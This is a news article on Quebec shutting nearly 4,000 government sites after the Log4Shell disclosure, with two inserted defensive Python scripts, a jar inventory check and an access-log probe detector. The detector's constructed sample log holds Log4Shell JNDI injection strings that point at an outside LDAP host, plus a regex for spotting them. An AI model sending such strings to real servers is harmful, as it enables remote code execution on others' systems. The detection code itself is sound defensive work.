Quebec shuts down thousands of sites after disclosure of the Log4Shell flaw


Quebec shut down nearly 4,000 of its sites as a preventative measure after the disclosure of a PoC exploit for the Log4Shell flaw (CVE-2021-44228) in the Apache Log4j Java-based logging library.


On Friday, December 10, 2021, Chinese security researcher p0rz9 publicly disclosed PoC exploit code for this issue and revealed that CVE-2021-44228 can only be exploited if the log4j2.formatMsgNoLookups option is set to false.

Log4j is an open-source library widely used by both enterprise apps and cloud services, including Apple iCloud and Steam.

A remote, unauthenticated attacker can exploit CVE-2021-44228 to execute arbitrary code on a vulnerable system, leading to a complete system takeover.

The vulnerability was discovered by researchers from Alibaba Cloud’s security team, who notified the Apache Foundation on November 24. According to the experts, the vulnerability is easy to exploit and does not require any special configuration; for this reason it received a CVSSv3 score of 10/10. The researchers pointed out that Apache Struts2, Apache Solr, Apache Druid and Apache Flink are all affected by this vulnerability.
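The two facts above that matter to a defender are the affected library (log4j-core) and the log4j2.formatMsgNoLookups stopgap mentioned earlier. The script below is an added example, not code from the article or from the Apache project: it walks a directory tree for log4j-core jars, classifies each by version, checks whether the jar still ships the JndiLookup class, and reports whether the formatMsgNoLookups property or its LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable is set. The fixture jars, paths and JVM arguments are constructed for the demo; the only external fact assumed is that 2.15.0 is the first log4j-core release Apache shipped with a fix for CVE-2021-44228.

```python
"""Inventory check for Log4Shell exposure: find log4j-core jars, classify
their version, and check whether the formatMsgNoLookups stopgap is set.
Added example; the jar names, paths and JVM arguments below are constructed."""
import os
import re
import tempfile
import zipfile

# log4j-core 2.0-beta9 through 2.14.1 ship JndiLookup; 2.15.0 is the first
# release Apache published with a fix for CVE-2021-44228 (assumption stated in lead-in).
FIXED_VERSION = (2, 15, 0)
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME_RE = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?[^/\\]*\.jar$")


def parse_log4j_core_version(path):
    """Return (major, minor, patch) from a log4j-core jar file name, or None."""
    m = JAR_NAME_RE.search(os.path.basename(path))
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable_version(version):
    """True for any 2.x release older than the first fixed release."""
    return version is not None and version[0] == 2 and version < FIXED_VERSION


def jar_contains_jndi_lookup(path):
    """True if the jar still contains the JndiLookup class (not stripped out)."""
    with zipfile.ZipFile(path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def lookups_disabled(jvm_args, env):
    """True if the formatMsgNoLookups stopgap is enabled via system property or env var."""
    if any(a.lower() == "-dlog4j2.formatmsgnolookups=true" for a in jvm_args):
        return True
    return env.get("LOG4J_FORMAT_MSG_NO_LOOKUPS", "").lower() == "true"


def find_log4j_core_jars(root):
    """Walk a directory tree and return every log4j-core jar path found, sorted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if JAR_NAME_RE.search(name):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def assess(root, jvm_args, env):
    """Return (jar_path, verdict) for every log4j-core jar under root."""
    findings = []
    for jar in find_log4j_core_jars(root):
        version = parse_log4j_core_version(jar)
        if not is_vulnerable_version(version):
            findings.append((jar, "fixed-version"))
        elif not jar_contains_jndi_lookup(jar):
            findings.append((jar, "jndilookup-removed"))
        elif lookups_disabled(jvm_args, env):
            findings.append((jar, "vulnerable-version-lookups-disabled"))
        else:
            findings.append((jar, "vulnerable"))
    return findings


def build_demo_tree():
    """Constructed fixture: two empty fake jars so the scan runs offline."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    os.makedirs(os.path.join(root, "app1", "lib"))
    os.makedirs(os.path.join(root, "app2", "lib"))
    with zipfile.ZipFile(os.path.join(root, "app1", "lib", "log4j-core-2.14.1.jar"), "w") as jar:
        jar.writestr(JNDI_LOOKUP_CLASS, b"")       # old version, class still present
    with zipfile.ZipFile(os.path.join(root, "app2", "lib", "log4j-core-2.15.0.jar"), "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", b"")   # fixed version
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for jar_path, verdict in assess(demo_root, ["-Xmx1g"], {}):
        print(f"{verdict:40s} {jar_path}")
```

The verdicts are deliberately ordered: a fixed version wins over everything, a jar with JndiLookup removed is treated as mitigated, and the formatMsgNoLookups flag is reported as a separate, weaker state rather than as "fixed", since Apache later documented that the property alone is not a complete mitigation. In practice the JVM arguments would come from the running process (for example the ps output or the service unit) rather than a hard-coded list.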


Open-source projects like ElasticSearch, Elastic Logstash, Redis, and the NSA’s Ghidra also use the library.
IT giants like Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, and NetEase are running servers potentially affected by the issue.
Security experts are already observing mass scanning activity for this vulnerability.

Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (https://t.co/GgksMUlf94). Query our API for “tags=CVE-2021-44228” for source IP addresses and other IOCs. #threatintel
— Bad Packets (@bad_packets) December 10, 2021

GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
— GreyNoise (@GreyNoiseIO) December 10, 2021

Today Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire confirmed the government’s decision to shut down sites that were being scanned for potentially malicious purposes connected to the exploitation of the Log4Shell flaw.
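The scanning reported by Bad Packets and GreyNoise above shows up in web-server access logs as requests carrying a Log4j lookup string in a field that the application later logs, most often the User-Agent or the query string. The script below is an added example, not code from the article or from either vendor: it parses combined-format access log lines, URL-decodes the request, referer and user-agent fields, and flags any that contain a JNDI lookup token, then summarises the distinct source addresses. The log lines and addresses are constructed (TEST-NET ranges), not real traffic.

```python
"""Triage filter for Log4Shell probes in access logs.
Added example; the sample log lines below are constructed (TEST-NET addresses)."""
import re
from urllib.parse import unquote

# A JNDI lookup token, tolerant of case and whitespace variations.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Combined log format: client - - [time] "request" status size "referer" "user-agent"
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def normalise(text):
    """URL-decode twice (probes are often double-encoded) and lower-case."""
    return unquote(unquote(text)).lower()


def classify_line(line):
    """Return None for a clean or unparseable line, else a finding dict."""
    m = CLF_RE.match(line)
    if not m:
        return None  # not combined log format: leave for a different parser
    hits = [field for field in ("request", "referer", "agent")
            if JNDI_RE.search(normalise(m.group(field)))]
    if not hits:
        return None
    return {"client": m.group("client"), "time": m.group("time"), "fields": hits}


def scan(lines):
    """Run classify_line over an iterable of log lines and keep the findings."""
    return [f for f in (classify_line(line) for line in lines) if f]


def distinct_clients(findings):
    """Sorted list of source addresses seen probing, for blocking or enrichment."""
    return sorted({f["client"] for f in findings})


# Constructed sample log lines (not real traffic): one benign request, one probe
# in the User-Agent, one URL-encoded probe in the query string.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for finding in results:
        print(f"{finding['time']} {finding['client']} probe in {', '.join(finding['fields'])}")
    print("distinct sources:", distinct_clients(results))
```

Treat this as a first-pass triage filter rather than a verdict: Log4j lookups can be nested, so the literal token is not the only form a probe takes, and a matching request does not by itself mean the backend logged the field or was vulnerable. Correlating the source addresses with the CVE-2021-44228 tags that Bad Packets and GreyNoise mention above is the quicker way to separate opportunistic scanners from anything targeted.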

The government closed 3,992 sites including the education and higher education ministries’ sites.

“On Friday the 10th, we received, like everyone else on the planet, a status report on a computer security flaw that affects many systems,” Caire explained in a news conference. “We need to scan all of our systems,” said Caire. “We’re kind of looking for a needle in a haystack.”

The Minister explained that it is a preventive measure and they are not aware of any security breach caused by the exploitation of the issue.

“It’s a decision preventive not reactive,” added Caire.

Some of the sites that had been taken offline are back online.

The post Quebec shuts down thousands of sites after disclosure of the Log4Shell flaw appeared first on Security Affairs.